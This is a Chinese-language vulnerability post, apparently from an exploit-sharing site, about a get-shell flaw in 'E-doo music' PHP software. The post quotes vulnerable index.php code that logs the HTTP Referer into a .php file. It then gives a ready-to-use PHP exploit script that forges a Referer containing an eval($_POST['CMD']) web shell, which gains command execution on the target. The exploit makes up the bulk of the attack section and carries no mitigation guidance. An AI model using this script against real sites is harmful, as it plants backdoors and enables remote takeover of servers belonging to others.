热门关键字:   漏洞发布 网站安全 网络攻击 高级编辑 无限安全 云安全

E-doo music get shell Vulnerability

发布时间:2018-10-31 13:17文章来源:未知文章作者: 点击次数:
摘要:发布时间:09-11-6 发布人:神秘小强 漏洞描述: index.php line 10 $data_name =get_date(); ...... $from = $_SERVER [ HTTP_REFERER ]; ...... if ( file_exists ( $sys_data_dir/stat/$data_name.php )) { $stat_data =file( $sys_data_

发布时间:09-11-6

发布人:神秘小强

漏洞描述:

index.php line 10

  1. $data_name=get_date();  
  2.   
  3. ... ...  
  4.   
  5. $from=$_SERVER["HTTP_REFERER"];  
  6.   
  7. ... ...  
  8.   
  9. if(file_exists("$sys_data_dir/stat/$data_name.php"))  
  10. {  
  11. $stat_data=file("$sys_data_dir/stat/$data_name.php");  
  12. for($a=0;$a<count($stat_data);$a++)  
  13.     {  
  14.     $stat_info=explode("|",$stat_data[$a]);  
  15.     if($stat_info[0]==$ip && $time_stamp-$stat_info[2]<$time_part)//如果此IP已经访问且访问时间小于访问记录时间,退出循环  
  16.         {  
  17.         break;  
  18.         }  
  19.     if($stat_info[0]==$ip && $time_stamp-$stat_info[2]>$time_part)//如果此IP已经访问但访问时间大于访问记录时间,进行写入操作  
  20.         {  
  21.         $tod_data=readfrom("$sys_data_dir/stat/$data_name.php");  
  22.         $new_data="$ip|$data_name/$now_time|$time_stamp|$earth_ip|$from|\n".$tod_data;  
  23.         writeto("$sys_data_dir/stat/$data_name.php",$new_data);  
  24.         break;  
  25.         }  

 

漏洞测试:

伪造http_referer 写入得shell /data/stat/年-月-日.php
------------------------------------------------------------------------------------
EXP:

  1. <?  
  2. $server = '';    //host  
  3. $host = '';    //host  
  4. $target = '/index.php';    //vul file  
  5. $referer = '<?eval($_POST['CMD']);?>';    // Referer  
  6. $port = 80;  
  7. $fp = fsockopen($server, $port, $errno, $errstr, 30);  
  8. if (!$fp)   
  9. {  
  10.   echo "$errstr ($errno)<br />\n";  
  11. }   
  12. else   
  13. {  
  14.         $out = "GET $target HTTP/1.1\r\n";  
  15.         $out .= "Host: $host\r\n";  
  16.         $out .= "Cookie: ASPSESSIONIDSQTBQSDA=DFCAPKLBBFICDAFMHNKIGKEG\r\n";  
  17.         $out .= "Referer: $referer\r\n";  
  18.         $out .= "Connection: Close\r\n\r\n";  
  19.         fwrite($fp, $out);  
  20.         while (!feof($fp))   
  21.         {  
  22.                 echo fgets($fp, 128);  
  23.         }  
  24.         fclose($fp);  
  25. }  
  26. ?> 
上一篇:Linux内核'pipe.c'本地特权提升漏洞
下一篇:无忧购物系统SQL注入漏洞